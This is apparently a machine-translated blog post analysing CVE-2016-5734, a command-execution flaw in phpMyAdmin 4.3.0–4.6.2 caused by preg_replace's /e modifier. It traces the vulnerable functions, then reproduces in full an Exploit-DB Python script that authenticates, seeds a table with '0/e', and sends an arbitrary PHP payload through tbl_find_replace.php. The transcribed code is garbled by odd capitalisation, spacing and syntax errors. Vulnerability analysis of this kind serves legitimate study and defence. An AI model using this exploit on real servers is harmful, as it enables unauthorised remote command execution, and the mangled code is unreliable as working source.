phpMyAdmin (4.3.0-4.6.2) command execution vulnerability caused by PHP preg_replace

Here take cve-2016-5734 to talk about the preg_replace of the command execution vulnerability, the vulnerability on the EXPLOIT-DB has a use of scripting, tested no problem. Here is a retrospective trace of this vulnerability to explain the problem with the Preg_replace replacement function.
0x01 Vulnerability Triggering principle

The Preg_replace vulnerability trigger has two prerequisites:

01: The first parameter requires the E identifier, with the command that it can execute the second argument
02: The first parameter needs to match in the third argument, otherwise Echo will return the third argument without executing the command, for example:

echo preg_replace ('/test/e ', ' phpinfo () ', ' just test ');

This is the way to execute a command.

echo preg_replace ('/test/e ', ' phpinfo () ', ' just tesxt ');

echo preg_replace ('/tesxt/e ', ' phpinfo () ', ' just test ');

These two do not match, so the return value is the third argument and cannot execute the command
0X02 Trigger Vulnerability Location backtracking

The cve-2016-5734 vulnerability problem appears in the TableSearch.class.php _getregexreplacerows function, let's take a look at this function:
Phpmyadmin_1
$find, and $replaceWith can see being referenced in Preg_replace, let's backtrack on these two variables, there's a call to the _getregexreplacerows function in Getreplacepreview
Phpmyadmin_2
To continue backtracking, there is a call to Getreplacepreview in the Tbl_find_replace, and the parameter is post incoming, let's see how to take advantage of the construction
Phpmyadmin_3
0X03 Structural Utilization

Exploit the idea: this loophole can not be directly used at present, because there are token restrictions, need to login to catch token, and need to construct a third parameter guarantee and the first parameter matching, the first parameter controllable, but the third parameter is taken from the database, so can only be inserted into the database in advance, And then out, ColumnIndex is to take out the field value controllable, so the third parameter can be controlled.
Process probably walked a lap, see how to construct, first of all, this vulnerability needs to create TABLE Insert field permissions of the account, here directly with the root account test, first create a table, and then the table Insert a field value of "0/e"
Phpmyadmin_4
#!/usr/bin/env python

# cve-2016-5734.py:phpmyadmin 4.3.0-4.6.2 Authorized user RCE exploit
# details:working only on PHP 4.3.0-5.4.6 versions, because of regex break with null byte-fixed in PHP 5.4.7.
# cve:cve-2016-5734
# author:https://twitter.com/iamsecurity
# run:./cve-2016-5734.py-u root--pwd= ' http://localhost/pma-c ' System (' Ls-lua ');
# https://www.exploit-db.com/exploits/40185/

Import requests
Import Argparse
Import Sys

__author__ = "@iamsecurity"

if __name__ = = ' __main__ ':
Parser = Argparse. Argumentparser ()
Parser.add_argument ("url", Type=str, help= "url with path to PMA")
Parser.add_argument ("-C", "--cmd", Type=str, help= "PHP command (s) to Eval ()")
Parser.add_argument ("-U", "--user", Required=true, Type=str, help= "Valid PMA user")
Parser.add_argument ("P", "--pwd", Required=true, Type=str, help= "Password for valid PMA user")
Parser.add_argument ("D", "--dbs", Type=str, help= "Existing database at a server")
Parser.add_argument ("T", "--table", Type=str, help= "Custom table name for exploit.")
arguments = Parser.parse_args ()
URL_TO_PMA = Arguments.url
uname = Arguments.user
UPass = Arguments.pwd
If Arguments.dbs:
db = Arguments.dbs
Else
db = "Test"
token = False
Custom_table = False
If arguments.table:
Custom_table = True
Table = arguments.table
Else
Table = "Prgpwn"
If Arguments.cmd:
Payload = Arguments.cmd
Else
Payload = "System (' uname-a ');"

Size = 32
s = requests. Session ()
# You can manually add proxy support It's very simple;)
# s.proxies = {' http ': ' 127.0.0.1:8080 ', ' https ': ' 127.0.0.1:8080 '}
S.verify = False
sql = ' CREATE TABLE ' {0} ' (
' varchar ' CHARACTER SET UTF8 not NULL
) Engine=innodb DEFAULT charset=latin1;
INSERT into ' {0} ' (' Unhex ') VALUES (' 302f6500 ');
'. Format (table)

# Get_token
RESP = s.post (url_to_pma + "/?lang=en", Dict (
Pma_username=uname,
Pma_password=upass
))
If Resp.status_code is 200:
Token_place = Resp.text.find ("token=") + 6
token = Resp.text[token_place:token_place + 32]
If token is False:
Print ("Cannot get valid authorization token.")
Sys.exit (1)

If Custom_table is False:
data = {
"is_js_confirmed": "0",
"DB": DB,
"Token": token,
"POS": "0",
"Sql_query": SQL,
"Sql_delimiter": ";",
"Show_query": "0",
"Fk_checks": "0",
"SQL": "Go",
' Ajax_request ': ' true ',
' Ajax_page_request ': ' true ',
}
RESP = s.post (url_to_pma + "/import.php", Data, Cookies=requests.utils.dict_from_cookiejar (s.cookies))
If Resp.status_code = 200:
If "Success" in Resp.json ():
If Resp.json () ["Success"] is False:
A = Resp.json () ["Error"][resp.json () ["Error"].find ("<code>") +6:]
Error = First[:first.find ("</code>")]
If "already exists" in error:
Print (Error)
Else
Print ("Error:" + error)
Sys.exit (1)
# Build Exploit
Exploit = {
"DB": DB,
"Table": Table,
"Token": token,
"Goto": "sql.php",
"Find": "0/e\0",
"ReplaceWith": Payload,
"ColumnIndex": "0",
"Useregex": "On",
"Submit": "Go",
' Ajax_request ': ' True '
}
RESP = S.post (
URL_TO_PMA + "/tbl_find_replace.php", Exploit, Cookies=requests.utils.dict_from_cookiejar (s.cookies)
)
If Resp.status_code = 200:
result = Resp.json () [' Message '][resp.json () [' Message '].find (' </a> '] +8:]
If Len (Result):
Print ("Result:" + result)
Sys.exit (0)
Print
"Exploit failed!\n"
"Try to manually set exploit parameters like--table,--database and--token.\n"
"Remember that servers with PHP version greater than 5.4.6"
"is not exploitable, because of warning about null byte in RegExp"
)
Sys.exit (1)